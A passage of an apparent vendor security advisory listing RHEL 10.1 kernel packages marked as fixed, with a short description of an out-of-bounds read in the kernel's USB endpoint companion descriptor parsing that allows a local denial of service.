| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
A flaw was found in the Linux kernel's USB core configuration parsing. Specifically, the `usb_parse_ss_endpoint_companion()` function incorrectly checks the descriptor type before its length, which can lead to reading data beyond the intended buffer. This out-of-bounds read vulnerability could allow a local attacker to cause a system crash, resulting in a Denial of Service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
